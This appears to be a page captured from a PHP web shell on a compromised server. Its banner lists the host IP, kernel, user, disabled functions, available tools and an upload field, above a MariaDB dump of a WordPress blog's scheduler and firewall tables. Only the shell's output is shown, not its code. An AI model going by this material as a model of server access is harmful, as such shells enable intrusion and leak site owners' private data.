| Server IP : 45.94.215.241 / Your IP : 216.73.216.243 Web Server : Apache/2.4.66 (Ubuntu) System : Linux srv2937474766 7.0.0-28-generic #28-Ubuntu SMP PREEMPT_DYNAMIC Sun Jun 21 01:01:36 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.5.4 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/final/ |
Upload File : |
/*M!999999\- enable the sandbox mode */
-- MariaDB dump 10.19 Distrib 10.11.14-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: ictbank_blog_new_db
-- ------------------------------------------------------
-- Server version 10.11.14-MariaDB-0ubuntu0.24.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `wp_actionscheduler_actions`
--
DROP TABLE IF EXISTS `wp_actionscheduler_actions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_actions` (
`action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`hook` varchar(191) NOT NULL,
`status` varchar(20) NOT NULL,
`scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
`scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
`args` varchar(191) DEFAULT NULL,
`schedule` longtext DEFAULT NULL,
`group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`attempts` int(11) NOT NULL DEFAULT 0,
`last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
`last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
`claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`extended_args` varchar(8000) DEFAULT NULL,
`priority` tinyint(3) unsigned NOT NULL DEFAULT 10,
PRIMARY KEY (`action_id`),
KEY `hook` (`hook`),
KEY `status` (`status`),
KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
KEY `args` (`args`),
KEY `group_id` (`group_id`),
KEY `last_attempt_gmt` (`last_attempt_gmt`),
KEY `claim_id` (`claim_id`),
KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`),
KEY `hook_status_scheduled_date_gmt` (`hook`(163),`status`,`scheduled_date_gmt`),
KEY `status_scheduled_date_gmt` (`status`,`scheduled_date_gmt`),
KEY `claim_id_status_priority_scheduled_date_gmt` (`claim_id`,`status`,`priority`,`scheduled_date_gmt`),
KEY `status_last_attempt_gmt` (`status`,`last_attempt_gmt`),
KEY `status_claim_id` (`status`,`claim_id`)
) ENGINE=InnoDB AUTO_INCREMENT=216 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_actionscheduler_actions`
--
LOCK TABLES `wp_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_actions` VALUES
(139,'woocommerce_cleanup_draft_orders','failed','2022-12-03 19:48:35','2022-12-03 19:48:35','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1670096915;s:18:\"\0*\0first_timestamp\";i:1660396177;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1670096915;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',0,1,'2025-09-23 13:59:39','2025-09-23 13:59:39',25361,NULL,10),
(147,'woocommerce_cleanup_draft_orders','failed','2025-09-24 13:59:39','2025-09-24 13:59:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1758722379;s:18:\"\0*\0first_timestamp\";i:1660396177;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1758722379;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',7,1,'2025-10-02 12:31:26','2025-10-02 12:31:26',25365,NULL,10),
(153,'woocommerce_cleanup_draft_orders','failed','2025-10-03 12:31:26','2025-10-03 12:31:26','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1759494686;s:18:\"\0*\0first_timestamp\";i:1660396177;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1759494686;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',7,1,'2025-11-27 20:30:41','2025-11-27 20:30:41',25367,NULL,10),
(156,'woocommerce_cleanup_draft_orders','failed','2025-11-28 20:30:41','2025-11-28 20:30:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1764361841;s:18:\"\0*\0first_timestamp\";i:1660396177;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1764361841;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',7,1,'2025-11-28 20:31:44','2025-11-28 20:31:44',25369,NULL,10),
(159,'woocommerce_cleanup_draft_orders','failed','2025-11-29 20:31:44','2025-11-29 20:31:44','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1764448304;s:18:\"\0*\0first_timestamp\";i:1660396177;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1764448304;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',7,1,'2025-11-30 20:32:13','2025-11-30 20:32:13',25372,NULL,10),
(196,'rank_math/analytics/data_fetch','failed','2026-01-06 04:49:56','2026-01-06 04:49:56','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1767674996;s:18:\"\0*\0first_timestamp\";i:1758709320;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1767674996;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2026-02-11 13:43:50','2026-02-11 13:43:50',25420,NULL,10),
(198,'rank_math/analytics/data_fetch','failed','2026-02-12 13:43:50','2026-02-12 13:43:50','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1770903830;s:18:\"\0*\0first_timestamp\";i:1758709320;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1770903830;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2026-02-13 16:38:35','2026-02-13 16:38:35',25421,NULL,10),
(199,'rank_math/analytics/data_fetch','failed','2026-02-14 16:38:35','2026-02-14 16:38:35','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1771087115;s:18:\"\0*\0first_timestamp\";i:1758709320;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1771087115;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2026-02-22 21:53:14','2026-02-22 21:53:14',25423,NULL,10),
(200,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-02-14 16:38:35','2026-02-14 16:38:35','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1771087115;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1771087115;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-17 20:32:13','2026-04-17 20:32:13',25424,NULL,20),
(201,'rank_math/analytics/data_fetch','failed','2026-02-23 21:53:14','2026-02-23 21:53:14','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1771883594;s:18:\"\0*\0first_timestamp\";i:1758709320;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1771883594;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2026-04-17 20:32:13','2026-04-17 20:32:13',25424,NULL,10),
(202,'rank_math/analytics/data_fetch','failed','2026-04-18 20:32:13','2026-04-18 20:32:13','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1776544333;s:18:\"\0*\0first_timestamp\";i:1758709320;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1776544333;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2026-04-18 20:32:14','2026-04-18 20:32:14',25426,NULL,10),
(203,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-18 20:32:13','2026-04-18 20:32:13','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1776544333;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1776544333;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-18 20:32:15','2026-04-18 20:32:15',25426,NULL,20),
(204,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-19 20:32:15','2026-04-19 20:32:15','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1776630735;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1776630735;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-22 20:33:07','2026-04-22 20:33:07',25429,NULL,20),
(205,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-23 20:33:07','2026-04-23 20:33:07','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1776976387;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1776976387;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-24 20:31:53','2026-04-24 20:31:53',25431,NULL,20),
(206,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-25 20:31:53','2026-04-25 20:31:53','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1777149113;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1777149113;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-25 20:32:27','2026-04-25 20:32:27',25433,NULL,20),
(207,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-26 20:32:27','2026-04-26 20:32:27','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1777235547;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1777235547;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-27 20:31:37','2026-04-27 20:31:37',25436,NULL,20),
(208,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-28 20:31:37','2026-04-28 20:31:37','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1777408297;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1777408297;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-28 20:31:47','2026-04-28 20:31:47',25438,NULL,20),
(209,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-04-29 20:31:47','2026-04-29 20:31:47','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1777494707;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1777494707;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-04-30 20:34:32','2026-04-30 20:34:32',25441,NULL,20),
(210,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-05-01 20:34:32','2026-05-01 20:34:32','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1777667672;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1777667672;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-05-03 20:31:10','2026-05-03 20:31:10',25444,NULL,20),
(211,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-05-04 20:31:10','2026-05-04 20:31:10','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1777926670;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1777926670;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-05-04 20:32:33','2026-05-04 20:32:33',25446,NULL,20),
(212,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-05-05 20:32:33','2026-05-05 20:32:33','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1778013153;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1778013153;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-05-09 20:33:02','2026-05-09 20:33:02',25448,NULL,20),
(213,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-05-10 20:33:02','2026-05-10 20:33:02','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1778445182;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1778445182;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-05-12 20:30:02','2026-05-12 20:30:02',25450,NULL,20),
(214,'action_scheduler_run_recurring_actions_schedule_hook','complete','2026-05-13 20:30:02','2026-05-13 20:30:02','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1778704202;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1778704202;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2026-05-16 20:31:51','2026-05-16 20:31:51',25452,NULL,20),
(215,'action_scheduler_run_recurring_actions_schedule_hook','pending','2026-05-17 20:31:51','2026-05-17 20:31:51','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1779049911;s:18:\"\0*\0first_timestamp\";i:1758635909;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1779049911;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,20);
/*!40000 ALTER TABLE `wp_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_actionscheduler_claims`
--
DROP TABLE IF EXISTS `wp_actionscheduler_claims`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_claims` (
`claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`date_created_gmt` datetime DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`claim_id`),
KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=25454 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_actionscheduler_claims`
--
LOCK TABLES `wp_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_actionscheduler_groups`
--
DROP TABLE IF EXISTS `wp_actionscheduler_groups`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_groups` (
`group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`slug` varchar(255) NOT NULL,
PRIMARY KEY (`group_id`),
KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_actionscheduler_groups`
--
LOCK TABLES `wp_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_groups` VALUES
(1,'action-scheduler-migration'),
(2,'wc-admin-data'),
(3,'woocommerce-db-updates'),
(4,'woocommerce-remote-inbox-engine'),
(5,'ActionScheduler'),
(6,'rank-math'),
(7,'');
/*!40000 ALTER TABLE `wp_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_actionscheduler_logs`
--
DROP TABLE IF EXISTS `wp_actionscheduler_logs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_logs` (
`log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`action_id` bigint(20) unsigned NOT NULL,
`message` text NOT NULL,
`log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
`log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`log_id`),
KEY `action_id` (`action_id`),
KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=644 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_actionscheduler_logs`
--
LOCK TABLES `wp_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_logs` VALUES
(415,139,'action created','2022-12-02 19:48:35','2022-12-02 19:48:35'),
(428,139,'action started via Async Request','2025-09-23 13:59:39','2025-09-23 13:59:39'),
(429,139,'action failed via Async Request: Scheduled action for woocommerce_cleanup_draft_orders will not be executed as no callbacks are registered.','2025-09-23 13:59:39','2025-09-23 13:59:39'),
(430,147,'action created','2025-09-23 13:59:39','2025-09-23 13:59:39'),
(449,147,'action started via Async Request','2025-10-02 12:31:26','2025-10-02 12:31:26'),
(450,147,'action failed via Async Request: Scheduled action for woocommerce_cleanup_draft_orders will not be executed as no callbacks are registered.','2025-10-02 12:31:26','2025-10-02 12:31:26'),
(451,153,'action created','2025-10-02 12:31:26','2025-10-02 12:31:26'),
(458,153,'action started via WP Cron','2025-11-27 20:30:41','2025-11-27 20:30:41'),
(459,153,'action failed via WP Cron: Scheduled action for woocommerce_cleanup_draft_orders will not be executed as no callbacks are registered.','2025-11-27 20:30:41','2025-11-27 20:30:41'),
(460,156,'action created','2025-11-27 20:30:41','2025-11-27 20:30:41'),
(467,156,'action started via WP Cron','2025-11-28 20:31:44','2025-11-28 20:31:44'),
(468,156,'action failed via WP Cron: Scheduled action for woocommerce_cleanup_draft_orders will not be executed as no callbacks are registered.','2025-11-28 20:31:44','2025-11-28 20:31:44'),
(469,159,'action created','2025-11-28 20:31:44','2025-11-28 20:31:44'),
(476,159,'action started via WP Cron','2025-11-30 20:32:13','2025-11-30 20:32:13'),
(477,159,'action failed via WP Cron: Scheduled action for woocommerce_cleanup_draft_orders will not be executed as no callbacks are registered.','2025-11-30 20:32:13','2025-11-30 20:32:13'),
(478,159,'This action appears to be consistently failing. A new instance will not be scheduled.','2025-11-30 20:32:13','2025-11-30 20:32:13'),
(583,196,'action created','2026-01-05 04:49:56','2026-01-05 04:49:56'),
(587,196,'action started via Async Request','2026-02-11 13:43:50','2026-02-11 13:43:50'),
(588,196,'action failed via Async Request: Scheduled action for rank_math/analytics/data_fetch will not be executed as no callbacks are registered.','2026-02-11 13:43:50','2026-02-11 13:43:50'),
(589,198,'action created','2026-02-11 13:43:50','2026-02-11 13:43:50'),
(590,198,'action started via Async Request','2026-02-13 16:38:35','2026-02-13 16:38:35'),
(591,198,'action failed via Async Request: Scheduled action for rank_math/analytics/data_fetch will not be executed as no callbacks are registered.','2026-02-13 16:38:35','2026-02-13 16:38:35'),
(592,199,'action created','2026-02-13 16:38:35','2026-02-13 16:38:35'),
(595,200,'action created','2026-02-13 16:38:35','2026-02-13 16:38:35'),
(596,199,'action started via Async Request','2026-02-22 21:53:14','2026-02-22 21:53:14'),
(597,199,'action failed via Async Request: Scheduled action for rank_math/analytics/data_fetch will not be executed as no callbacks are registered.','2026-02-22 21:53:14','2026-02-22 21:53:14'),
(598,201,'action created','2026-02-22 21:53:14','2026-02-22 21:53:14'),
(599,201,'action started via WP Cron','2026-04-17 20:32:13','2026-04-17 20:32:13'),
(600,201,'action failed via WP Cron: Scheduled action for rank_math/analytics/data_fetch will not be executed as no callbacks are registered.','2026-04-17 20:32:13','2026-04-17 20:32:13'),
(601,202,'action created','2026-04-17 20:32:13','2026-04-17 20:32:13'),
(602,200,'action started via WP Cron','2026-04-17 20:32:13','2026-04-17 20:32:13'),
(603,200,'action complete via WP Cron','2026-04-17 20:32:13','2026-04-17 20:32:13'),
(604,203,'action created','2026-04-17 20:32:13','2026-04-17 20:32:13'),
(605,202,'action started via WP Cron','2026-04-18 20:32:14','2026-04-18 20:32:14'),
(606,202,'action failed via WP Cron: Scheduled action for rank_math/analytics/data_fetch will not be executed as no callbacks are registered.','2026-04-18 20:32:15','2026-04-18 20:32:15'),
(607,202,'This action appears to be consistently failing. A new instance will not be scheduled.','2026-04-18 20:32:15','2026-04-18 20:32:15'),
(608,203,'action started via WP Cron','2026-04-18 20:32:15','2026-04-18 20:32:15'),
(609,203,'action complete via WP Cron','2026-04-18 20:32:15','2026-04-18 20:32:15'),
(610,204,'action created','2026-04-18 20:32:15','2026-04-18 20:32:15'),
(611,204,'action started via WP Cron','2026-04-22 20:33:07','2026-04-22 20:33:07'),
(612,204,'action complete via WP Cron','2026-04-22 20:33:07','2026-04-22 20:33:07'),
(613,205,'action created','2026-04-22 20:33:07','2026-04-22 20:33:07'),
(614,205,'action started via WP Cron','2026-04-24 20:31:53','2026-04-24 20:31:53'),
(615,205,'action complete via WP Cron','2026-04-24 20:31:53','2026-04-24 20:31:53'),
(616,206,'action created','2026-04-24 20:31:53','2026-04-24 20:31:53'),
(617,206,'action started via WP Cron','2026-04-25 20:32:27','2026-04-25 20:32:27'),
(618,206,'action complete via WP Cron','2026-04-25 20:32:27','2026-04-25 20:32:27'),
(619,207,'action created','2026-04-25 20:32:27','2026-04-25 20:32:27'),
(620,207,'action started via WP Cron','2026-04-27 20:31:37','2026-04-27 20:31:37'),
(621,207,'action complete via WP Cron','2026-04-27 20:31:37','2026-04-27 20:31:37'),
(622,208,'action created','2026-04-27 20:31:37','2026-04-27 20:31:37'),
(623,208,'action started via WP Cron','2026-04-28 20:31:47','2026-04-28 20:31:47'),
(624,208,'action complete via WP Cron','2026-04-28 20:31:47','2026-04-28 20:31:47'),
(625,209,'action created','2026-04-28 20:31:47','2026-04-28 20:31:47'),
(626,209,'action started via WP Cron','2026-04-30 20:34:32','2026-04-30 20:34:32'),
(627,209,'action complete via WP Cron','2026-04-30 20:34:32','2026-04-30 20:34:32'),
(628,210,'action created','2026-04-30 20:34:32','2026-04-30 20:34:32'),
(629,210,'action started via WP Cron','2026-05-03 20:31:10','2026-05-03 20:31:10'),
(630,210,'action complete via WP Cron','2026-05-03 20:31:10','2026-05-03 20:31:10'),
(631,211,'action created','2026-05-03 20:31:10','2026-05-03 20:31:10'),
(632,211,'action started via WP Cron','2026-05-04 20:32:33','2026-05-04 20:32:33'),
(633,211,'action complete via WP Cron','2026-05-04 20:32:33','2026-05-04 20:32:33'),
(634,212,'action created','2026-05-04 20:32:33','2026-05-04 20:32:33'),
(635,212,'action started via WP Cron','2026-05-09 20:33:02','2026-05-09 20:33:02'),
(636,212,'action complete via WP Cron','2026-05-09 20:33:02','2026-05-09 20:33:02'),
(637,213,'action created','2026-05-09 20:33:02','2026-05-09 20:33:02'),
(638,213,'action started via WP Cron','2026-05-12 20:30:02','2026-05-12 20:30:02'),
(639,213,'action complete via WP Cron','2026-05-12 20:30:02','2026-05-12 20:30:02'),
(640,214,'action created','2026-05-12 20:30:02','2026-05-12 20:30:02'),
(641,214,'action started via WP Cron','2026-05-16 20:31:51','2026-05-16 20:31:51'),
(642,214,'action complete via WP Cron','2026-05-16 20:31:51','2026-05-16 20:31:51'),
(643,215,'action created','2026-05-16 20:31:51','2026-05-16 20:31:51');
/*!40000 ALTER TABLE `wp_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_bv_activities_store`
--
DROP TABLE IF EXISTS `wp_bv_activities_store`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bv_activities_store` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`site_id` int(11) NOT NULL,
`user_id` int(11) DEFAULT 0,
`username` text DEFAULT '',
`request_id` text DEFAULT '',
`ip` varchar(50) DEFAULT '',
`event_type` varchar(60) NOT NULL DEFAULT '',
`event_data` mediumtext NOT NULL,
`time` int(11) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_bv_activities_store`
--
LOCK TABLES `wp_bv_activities_store` WRITE;
/*!40000 ALTER TABLE `wp_bv_activities_store` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bv_activities_store` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_bv_fw_requests`
--
DROP TABLE IF EXISTS `wp_bv_fw_requests`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bv_fw_requests` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`ip` varchar(50) NOT NULL DEFAULT '',
`status` int(1) NOT NULL DEFAULT 0,
`time` bigint(20) NOT NULL DEFAULT 1388516401,
`path` varchar(100) NOT NULL DEFAULT '',
`host` varchar(100) NOT NULL DEFAULT '',
`method` varchar(100) NOT NULL DEFAULT '',
`resp_code` int(6) NOT NULL DEFAULT 0,
`category` int(1) NOT NULL DEFAULT 4,
`referer` varchar(200) NOT NULL DEFAULT '',
`user_agent` varchar(200) NOT NULL DEFAULT '',
`filenames` text DEFAULT NULL,
`query_string` text DEFAULT NULL,
`rules_info` text DEFAULT NULL,
`request_id` varchar(200) DEFAULT NULL,
`matched_rules` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
